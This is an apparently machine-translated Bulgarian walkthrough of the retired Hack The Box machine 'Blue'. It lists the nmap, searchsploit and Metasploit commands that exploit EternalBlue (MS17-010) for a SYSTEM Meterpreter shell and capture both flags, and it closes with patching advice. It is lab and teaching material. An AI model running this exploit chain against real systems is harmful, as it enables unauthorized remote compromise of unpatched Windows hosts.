Запазете спокойствие и хакнете кутията - синьо

Hack The Box (HTB) е онлайн платформа, която ви позволява да тествате уменията си за тестване на проникване.

Той съдържа няколко предизвикателства, които непрекъснато се актуализират. Някои от тях симулират сценарии от реалния свят, а някои от тях се стремят повече към CTF стил на предизвикателство.

Забележка : Разрешени са само записвания на оттеглени HTB машини.

Blue е една от най-простите машини на Hack The Box. Но това демонстрира въздействието на експлоата на EternalBlue, който е бил използван за компрометиране на компании чрез мащабни атаки за рансъмуер и крипто-майнинг.

Ще използваме следните инструменти, за да заложим кутията в кутия на Kali Linux:

  • nmap
  • searchsploit
  • метасплойт
  • meterpreter

Да започваме.

Първо добавям синьо във файла / etc / hosts.

nano /etc/hosts

с

10.10.10.40 blue.htb

Стъпка 1 - разузнаване

Първата стъпка преди експлоатация на машина е да направите малко сканиране и разузнаване.

Това е една от най-важните части, тъй като ще определи какво можете да опитате да използвате след това. Винаги е по-добре да отделите повече време за тази фаза, за да получите колкото се може повече информация.

Сканиране на портове

Ще използвам Nmap (Network Mapper). Nmap е безплатна програма с отворен код за откриване на мрежа и одит на сигурността.

Той използва сурови IP пакети, за да определи какви хостове са налични в мрежата, какви услуги предлагат тези хостове, какви операционни системи изпълняват, какъв тип пакетни филтри / защитни стени се използват и десетки други характеристики.

Има много команди, които можете да използвате с този инструмент за сканиране на мрежата. Ако искате да научите повече за това, можете да разгледате документацията тук.

Използвам следната команда за извършване на интензивно сканиране:

nmap -A -v blue.htb

-A: Позволява откриване на операционна система, откриване на версии, сканиране на скриптове и трасиране

-v: Увеличава нивото на многословност

син .htb: име на хост за синята кутия

Ако откриете, че резултатите са твърде поразителни, можете да опитате това:

nmap blue.htb

Виждаме, че има доста отворени портове, включително:

Порт 445, Microsoft-DS (Directory Services) SMB споделяне на файлове

От сканирането на nmap имаме информация относно името на компютъра (haris-PC) и версията SMB (2.02).

Блокът за сървърни съобщения (SMB) е мрежов протокол, който позволява на потребителите да комуникират с отдалечени компютри и сървъри, за да използват ресурсите си или да споделят, отварят и редактират файлове.

От името на това поле и че това е машина с Windows с отворен порт 445, можем да предположим, че машината е уязвима към EternalBlue. Използвам nmap скрипт, за да проверя тази информация със следното:

nmap --script vuln -p 445 blue.htb

Можем да видим, че кутията е уязвима към уязвимост за дистанционно изпълнение на код в сървъри на Microsoft SMBv1 (ms17-010).

Стъпка 2 - Разбиране на ms17-010

Какво е ms17-010?

EternalBlue е кибератака, разработена от Агенцията за национална сигурност на САЩ (NSA). Той беше изтечен от хакерската група Shadow Brokers на 14 април 2017 г., един месец след като Microsoft пусна кръпки за уязвимостта - Wikipedia

Можете да прочетете повече тук. Тази уязвимост е закърпена и е посочена в бюлетина за сигурност на Microsoft като MS17-010.

EternalBlue позволява на хакерите да изпълняват дистанционно произволен код, за да получат достъп до мрежа. Той използва уязвимост в протокола SMB на Windows OS. Експлойтът може да компрометира цялата мрежа и свързаните с нея устройства.

Зловредният софтуер, който използва EternalBlue, може да се разпространява в мрежи. През 2017 г. WannaCry - крипто-рансъмуер - използва експлойт на EternalBlue, който се разпространява в мрежата, заразявайки всички свързани устройства.

Стъпка 3 - Използване на EternalBlue

Използвам Searchsploit, за да проверя дали има известен експлойт. Searchsploit е инструмент за търсене в команден ред за Exploit Database.

Използвам следната команда:

searchsploit eternalblue

Мога да получа повече подробности за експлойт с:

searchsploit -x 41738.py

Можете също да проверите базата данни Exploit, за да намерите експлоата.

Наличен е един модул Metasploit.

Ще използваме Metasploit , което е рамка за тестване на проникване, която улеснява хакерството. Това е основен инструмент за много нападатели и защитници.

Стартирам Metasploit Framework на Kali и търся командата, която трябва да използвам за експлоата.

Не забравяйте да актуализирате Metasploit, когато го стартирате с тази команда:

msfupdate

Можете също така да проверите дали целта е уязвима към EternalBlue на Metasploit с помощта на помощно средство. Започнете с тази команда:

search eternalblue

тогава в този случай

use 1

за да изберете

auxiliary/scanner/smb/smb_ms17_010

Можете да проверите опциите с

show options

и задайте RHOSTS с

set RHOSTS blue.htb

След това стартирайте помощната с

run

Можете да видите, че хостът вероятно е уязвим към MS17-010!

Нека сега проверим експлоата с

use 2

или командата

exploit/windows/smb/ms17_010_eternalblue

Трябва да настроим опциите за RHOSTS

и LHOST - моят беше 10.10.14.24. Ще трябва да го настроите със собствен LHOST. Можете да проверите своето тук.

Преди да стартирате експлоата, можете да проверите тук дали машината е уязвима - това ще стартира спомагателното, което използвахме по-рано с командата

check

След това стартирам експлоата с

run

Експлойтът трябваше да се изпълни няколко пъти, преди да имам сесия на Meterpreter .

Ето дефиницията на Meterpreter от Offensive Security:

Meterpreter е усъвършенстван, динамично разширяем полезен товар, който използва вградени в паметта DLL инжектори и се разширява по мрежата по време на изпълнение. Той комуникира през сокера на стагера и предоставя изчерпателен Ruby API на клиента. Той включва история на командите, завършване на раздела, канали и др.

Можете да прочетете повече за Meterpreter тук.

Нека започнем, като съберем малко информация.

getuid връща реалния потребителски идентификатор на извикващия процес.

Акаунтът NT Authority \ SYSTEM или LocalSystem е вграден акаунт в Windows. Това е най-мощният акаунт в локален екземпляр на Windows. Имаме администраторски достъп на тази машина.

Стъпка 4 - Търсите знамето user.txt

Придвижвам се до папката haris от Документи и настройки .

Мога да изброя всички файлове / папки със следната команда:

ls -la

След това се премествам на работния плот с

cd Desktop

И намирам флага на потребителя! Мога да проверя съдържанието на файла с

cat user.txt

Стъпка 5 - Търсене на флага root.txt

Нека сега намерим коренния флаг. Придвижвам се до Потребители и се регистрирам в папката Администратор / Работен плот . Намирам знамето!

Използвам следната команда, за да видя съдържанието на файла:

cat root.txt

Поздравления! Намерихте и двата флага.

Саниране

  • Кръпнете вашите устройства с актуализацията на защитата за Microsoft Windows SMB v1. Можете да проверите бюлетина за сигурност на Microsoft, за да видите кои операционни системи са засегнати
  • Деактивирайте SMB v1 и използвайте SMB v2 или v3
  • Приложете принципа на най-малката привилегия към всичките си системи и услуги

Моля, не се колебайте да коментирате, да задавате въпроси или да споделяте с приятелите си :)

Можете да видите още статии от поредицата Keep Calm and Hack the Box тук.

Можете да ме следвате в Twitter или в LinkedIn.

И не забравяйте да # GetSecure , # BeSecure & # StaySecure !